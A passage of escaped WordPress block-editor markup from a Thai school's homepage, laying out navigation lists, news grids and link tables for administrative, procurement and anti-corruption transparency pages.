class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, 